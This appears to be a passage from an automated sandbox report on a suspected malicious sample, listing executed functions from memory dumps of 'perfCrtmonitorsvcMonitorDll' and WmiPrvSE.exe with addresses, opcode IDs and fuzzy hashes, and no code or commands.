Instruction Fuzzy Hash: 7321EB36B4D55E9BEB30A798DC556EE33A0FF90320F02017BC054D71A1DEB82609D681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90E40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de156be1f2d75bb852308fa38518d89d0a51e8fb255ded473930b5251d47b56
Instruction ID: bc839a407465fcf5dc69ffc1f5b34cf0acd1b2b95a312f1a654fdbeadfe6df09
Opcode Fuzzy Hash: 1de156be1f2d75bb852308fa38518d89d0a51e8fb255ded473930b5251d47b56
Instruction Fuzzy Hash: 4121E775E0E28E8FE7219BA0C8242FA7BF0EF16B45F050176C055D61E2DA7C6609DB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90DC9 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3fef2d78c2d56c013335360dc3911690915d9e9abf37148e7f3fca2549b997
Instruction ID: 575562b1236565375d40f7b496579be9cf04f4fdd56162b930d93b87e741e4af
Opcode Fuzzy Hash: 7d3fef2d78c2d56c013335360dc3911690915d9e9abf37148e7f3fca2549b997
Instruction Fuzzy Hash: 90115E70E0E24E8FEB319BA4C8242BE7BF1AF05750F054576C015D62E2DA7C6644EB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA916F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931945fb26e1957308d9e1d8f0deedf6b44c059bfc0258852262b680e64772ae
Instruction ID: b12d9333e5f49d40bc541c4967c0c1301e6ebb6fb2f3115f0a229708edaf2ca5
Opcode Fuzzy Hash: 931945fb26e1957308d9e1d8f0deedf6b44c059bfc0258852262b680e64772ae
Instruction Fuzzy Hash: 68115B3088E3CA5FD7439BB08868AD57FB4EF57214B1904EBD489CB0A3C66D554ACB22

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA914A0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904a35d62e8ac93642da68497e10341a0702680da5a842905b7ea8ba8af49649
Instruction ID: 814473966cf124c14c4690cb4a034d1c302c5b7f4d4c78ead53a4dc11bc13d48
Opcode Fuzzy Hash: 904a35d62e8ac93642da68497e10341a0702680da5a842905b7ea8ba8af49649
Instruction Fuzzy Hash: 1C01407144E3CA8FD7239BB088712907FB0AF17204F0A44E7D499CB0E3D65C6959D722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26883e1f73d2542bfd3c7b4b8b88318084c364647d2bceb482a298dab8d119d7
Instruction ID: 45e77874fa411437125e51fe8812a3291e71cd149bbfaca42e6517a3cf641cd9
Opcode Fuzzy Hash: 26883e1f73d2542bfd3c7b4b8b88318084c364647d2bceb482a298dab8d119d7
Instruction Fuzzy Hash: E301D43190F38D8EE7799BA448742B83FA0AF16700F4600A6D488CA0E3D9685548D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 096cf0436f4c9e91eeb63f8c5880af2fc5df167b963091b8a3f8dc486fd1447a
Instruction ID: 5b8ac3e53413f84c08941ab9d8fd0f98c6b6db39aeff1a9311935bdc71ed3303
Opcode Fuzzy Hash: 096cf0436f4c9e91eeb63f8c5880af2fc5df167b963091b8a3f8dc486fd1447a
Instruction Fuzzy Hash: F4F05931A1E64D8AEB78EBA444642F97BE0EF15B00F410075E48DC20E2DD785694D344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA919A5 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765da69757794aa22d800dd5aca8ecac4d07a476251309b066af10382c889011
Instruction ID: 8f5d6c3ebb0b6bbe8929ea06e1f07c253537303bf18c6ef3c854b30d80d74a0f
Opcode Fuzzy Hash: 765da69757794aa22d800dd5aca8ecac4d07a476251309b066af10382c889011
Instruction Fuzzy Hash: 85F09030A5A24D9FDB24DFA8C8A97ED7BE0FF14304F0401BAE85CC21A1DAB45260DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA91250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction ID: 64da64ced7b6e3200f6ba7b3ade38b781d3a1923f06c49be747189ac9214e9b7
Opcode Fuzzy Hash: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction Fuzzy Hash: 14F03034A1910EDBDB64EB80D8609BE73B5BF55740F114235D01AD25A1CEB86604A640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 8cccdc613af9595899b2e3c38eb21105f4548c6863ef038783a70e61d6cdd93a
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 17E01B30F4F40FCAE730A79488645FE7374DF51791F115531D429861A6DDBC6345AB88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA2760 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fe0127f8b4e02a1a102d2bd94e343a6ed67479f214afbc45d379bed57fd09d
Instruction ID: c5fbefad6c70ea55e887a7459c2d354ab4ebabdea5ed57e9c6c09e5d095b6fc3
Opcode Fuzzy Hash: 65fe0127f8b4e02a1a102d2bd94e343a6ed67479f214afbc45d379bed57fd09d
Instruction Fuzzy Hash: E9E04F30D5AA0D9BEB60BBE489586FDB7A4EF08304F410872E40DC20A1DA7463E48A41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 3f64df50e60aa82d810ce70e2bdbfe82a66129f13fb2b9253aa785014eb0c0c2
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 81E04F30E4B40FCAE730AB98C8545BE7370EF50751F018632C425862A5DEBCA2419B84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA9114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: 765fc2477e2c8edf49c2eb7a0bd33ee0c70b21f38777ae38d877c19102e32bfd
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 98E0EC34A0551ECFDB24EF80C8A49BE73B1FB94350F010A39D426D72A1DBB86604DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA90BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: 638201518cfd9142c81508f6134e22c7b941845550fcd348ec60f02ebcb52e0d
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: BEE01230E0640ACBEB30DB84C8546BF7370EB50752F018226C82687295DA7CA645DF84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BA9141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1700224407.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9ba90000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b62262820ed143a4b4179cb721d35defdd26e00fde39e524ad60164521353f
Instruction ID: d249e5428c2cd45e99496a979c5e208f326905d3270f40b9f08fd6a0752aa473
Opcode Fuzzy Hash: 34b62262820ed143a4b4179cb721d35defdd26e00fde39e524ad60164521353f
Instruction Fuzzy Hash: 8FD09E74A1562D9EDBA0DBA4C458B6977F0AF15704F0101A5D01CD2151DBB816845B42

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WmiPrvSE.exePID: 7964, Parent PID: 7720COMMON

Executed Functions

Function 00007FFD9BAAE9B0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56a3d7ef19752c973d139878cdeec4fd80e092dd0a12e7ff9b3ae5d5f6390e8
Instruction ID: a75f6797390d83bfb2595894dfe0fe46a3430b77ac5b79d17a2c7d652dc5f95a
Opcode Fuzzy Hash: f56a3d7ef19752c973d139878cdeec4fd80e092dd0a12e7ff9b3ae5d5f6390e8
Instruction Fuzzy Hash: E2511B71E09A5D8FDFA4EB98C895BEDBBF2FF58300F50016AD00DE3296DA7469418B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA1519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f0f37a195dd274fba134988822c7023d230fc2d2353bfeba62ca0fc20c33d9
Instruction ID: 125633ccf0204b5b715c3ca3b894a96304e56a16294ba022c65c165dc0c99ba4
Opcode Fuzzy Hash: 79f0f37a195dd274fba134988822c7023d230fc2d2353bfeba62ca0fc20c33d9
Instruction Fuzzy Hash: 1E416D70E1A60D8FEB64DF94C4646FCBBF2EF56304F55017AD009E72A2CA786A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0510 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03c3fab7f18aa0fd5ffffd4e055da228c7fbf732a871cb634958da320bb74d25
Instruction ID: 6e2b8e79e5758aff19608dabf435b4416120dd7d34ddf93390817a45516314ab
Opcode Fuzzy Hash: 03c3fab7f18aa0fd5ffffd4e055da228c7fbf732a871cb634958da320bb74d25
Instruction Fuzzy Hash: DB31E222B0D15656E724BBBCA8615E97BA0DF6533FF0846B3F4AD8C0D7CD282589C294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e949455ed9692958d825bab00cffa8ce2da42a8fe58931cdb0f99c06a821e6d
Instruction ID: 5f3b22d52fd519bd2de54b2631e8d0191690c0774745caae2164bf24816e2c92
Opcode Fuzzy Hash: 7e949455ed9692958d825bab00cffa8ce2da42a8fe58931cdb0f99c06a821e6d
Instruction Fuzzy Hash: 1A211E71E1950D8FEB64EB98C4646FDB7F2FF69301F15417AD009E72A1CA786940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA1085 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b710b4d5576fe60b1355622f5be0c8be60cb1ec62776d6e3c0ad45f96dbffdef
Instruction ID: 55e320b3bd1754672f4ce5d477724641a482cd329957f77cabaebdd16e446f03
Opcode Fuzzy Hash: b710b4d5576fe60b1355622f5be0c8be60cb1ec62776d6e3c0ad45f96dbffdef
Instruction Fuzzy Hash: 93210536A0D55EABD731AB98EC656EE73A1FBD1320F02027BC044D71A5DBAC6618C690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0E40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade47dfd94d92f726a099c91626d3c3d139b970f565078b795ba9ed0c9eb5096
Instruction ID: 87fbb4acbf3e5af3dddc900f5f48d1200633245197594f7318c81d91c57d1794
Opcode Fuzzy Hash: ade47dfd94d92f726a099c91626d3c3d139b970f565078b795ba9ed0c9eb5096
Instruction Fuzzy Hash: 3421D871E4E28E8FE7719B6088142FA7BB1EF16701F050176C059D61E2DA7C6A05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0580 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba56a81f2f9c892bb74d3b8fd64f17362ea26406d5e13d1042061583dcdcbc3f
Instruction ID: d3a1f1b1556cd5c532251b9be821722999f49ded4cbdbb924ce59047a8025417
Opcode Fuzzy Hash: ba56a81f2f9c892bb74d3b8fd64f17362ea26406d5e13d1042061583dcdcbc3f
Instruction Fuzzy Hash: 0C112721A0D15A4AD724FBACA8745E97BA0EF1533EF0406B3F45D890D7CE642594C291

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0DC9 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5f61eb3fe389b08cce2fbbfb9e262142544e560a6f6d3e77cb4e61f7073468
Instruction ID: 2cbc6c5dbc84d03b8f14f3647f1b416046c68513acfaa41b2c6405f4d00fb473
Opcode Fuzzy Hash: bc5f61eb3fe389b08cce2fbbfb9e262142544e560a6f6d3e77cb4e61f7073468
Instruction Fuzzy Hash: 5D115170E0E24E8FE7719B94C8242BE7BB2AF05700F054576C019961E2DA7C6A54DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0FC5 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f8d8185e685ed37b5193b736e2bd535467e60398e1db1ccbbea57e4ca02320
Instruction ID: 9a67773cc7b6dfe1c1708d2c10b93940b34b62138034ea5d581c1d92296ab74a
Opcode Fuzzy Hash: e1f8d8185e685ed37b5193b736e2bd535467e60398e1db1ccbbea57e4ca02320
Instruction Fuzzy Hash: 4011C231A1828D9FDB10EF78C855AED3BA5FF18308F0405BAE88893165EB347558CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA16F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84091a118451a2ca5cb71b2d159efaf7330d95a266335de7fee98672ac0f8ee6
Instruction ID: cf7a9ab201fb3627ff81bd5b44369401579aaeb3f4c6b39b6b8fce96df6e6f0a
Opcode Fuzzy Hash: 84091a118451a2ca5cb71b2d159efaf7330d95a266335de7fee98672ac0f8ee6
Instruction Fuzzy Hash: F7115E3148E3CA5FD7439BB088685D57FB4EF47214F1940EBD485CB0A3D66D554ACB21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA14A0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bdb5407de54ee614e606196eb0687b09e5e4108f27d3104e9ab67dc1795b64
Instruction ID: 12729956ff69f74775511e71e6230136ee55c65ef4e5e1332721bc98ff6ad950
Opcode Fuzzy Hash: 92bdb5407de54ee614e606196eb0687b09e5e4108f27d3104e9ab67dc1795b64
Instruction Fuzzy Hash: 38012D7144E3CA8FC7639BB488712907FB5AF13200F0A44E7D495CB4E3D6686959C722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA05A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171d7c33ed9222db8a881899ea52d1bb57d956b877304e220ca7142702e84b24
Instruction ID: f6eb166a5a22d814676144b3d7e5308c0d722b30b61e1f80b07e4a99a7943a1b
Opcode Fuzzy Hash: 171d7c33ed9222db8a881899ea52d1bb57d956b877304e220ca7142702e84b24
Instruction Fuzzy Hash: 4A012431A0E18E4AEB24FBA898245F97BA0AF1532AF0506B6F85C850E7CE746594C250

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43662853ab1437ddb6069dda524e4532af625a5be32909b8652b7636b7ba24e4
Instruction ID: 021a30dd90bca69a46eb5b8bb8c20631b3bbcacf9d1a41522fa48f7650a63644
Opcode Fuzzy Hash: 43662853ab1437ddb6069dda524e4532af625a5be32909b8652b7636b7ba24e4
Instruction Fuzzy Hash: 3C01F731A0F3CD4FE7769BA448742F97FA0AF16700F4600B6D08CC60E3DA685A58C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA8258 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e113d6d11d1127d42fdd5085db5c0b6ff37df4a18eeac54ea59665e5fc77df39
Instruction ID: 929f7031608ad663c1f2fea60274d9bd1b583e4856b4f4cf94ab5c3e0f1a5eae
Opcode Fuzzy Hash: e113d6d11d1127d42fdd5085db5c0b6ff37df4a18eeac54ea59665e5fc77df39
Instruction Fuzzy Hash: E2F01D30E1990E9EEFA0EFA998286FDB7E5FF18300F414536E41DD21A0DBB46254CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA05D8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3e6e407fa06937c7f1a4469abffcb59dacceb6d0f31d44134ef7486f9bcf12
Instruction ID: bbfff033470a4b9cb66a2dfe2140260bfa8b5ed52d0dba70445cb2854fdb65a9
Opcode Fuzzy Hash: 7c3e6e407fa06937c7f1a4469abffcb59dacceb6d0f31d44134ef7486f9bcf12
Instruction Fuzzy Hash: 9FF0EC3091964D8FDF90EF68C849AEE77F0FF58305F51056AE81DD21A4DA34A1948B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 054513e56b7a1976e8d11efcd6b6ea4bd9c77d8fc895e74d5d26c4254551b1e4
Instruction ID: b83de47ee355bb7bce8cfa3499c58848f57e8e4377b361476ff4c6f32c06c70d
Opcode Fuzzy Hash: 054513e56b7a1976e8d11efcd6b6ea4bd9c77d8fc895e74d5d26c4254551b1e4
Instruction Fuzzy Hash: 65F05930A1E64E8AEB74EBA484742F97BE0EF15704F410075E48DC10E1DE742694C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA19A5 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0a1f385e083c54bd80b2a31239b293c77bad86dccbfd98d341bad371830793
Instruction ID: 18781ba19b95037fa94b463b22f4ef7b3825e2a99996b8164372d8030b4672ed
Opcode Fuzzy Hash: 5c0a1f385e083c54bd80b2a31239b293c77bad86dccbfd98d341bad371830793
Instruction Fuzzy Hash: 72F09030A0A24D9FDB20DFA8C8A56ED7BE0FF15704F0501BAE858C21A1DBB45260CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0FAD Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959cf3ff2f07bf6a284b9225544a71c8de68e184e48b5cdb1fb7a69d5933625c
Instruction ID: 9395d37fe6b0967683ba5f3a1aa814d9f4f5311c93e236b596f368f5caeb8afc
Opcode Fuzzy Hash: 959cf3ff2f07bf6a284b9225544a71c8de68e184e48b5cdb1fb7a69d5933625c
Instruction Fuzzy Hash: CBF06D30A1964D8FEB54EF64C4586ED7BB1FF58304F10007AE81CC21A1CB34A2A4CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA8328 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1729653347.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9baa0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ecb2f6efd5406afa99a0c9cfb4893a29816d963681dd9d8b68d23409fe04b3
Instruction ID: 4471fcc84a8aa52c08995d518750f6bb97a8b442b818ce5a0ae338b9e13134b0
